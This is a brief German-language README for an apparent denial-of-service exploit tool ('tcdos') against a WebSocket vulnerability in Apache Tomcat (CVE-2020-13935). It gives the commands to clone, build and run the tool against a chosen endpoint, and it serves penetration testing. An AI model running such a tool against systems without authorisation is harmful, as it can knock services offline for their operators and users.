
Exploit für WebSocket-Schwachstelle in Apache Tomcat
Im zugehörigen Blogbeitrag werden die Analyse und die Ausnutzung der Schwachstelle im Detail erläutert.
Klonen Sie das Repository und bauen Sie anschließend die tcdos-Binärdatei. Führen Sie das Programm wie folgt aus, um zu testen, ob ein bestimmter WebSocket-Endpunkt verwundbar ist:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]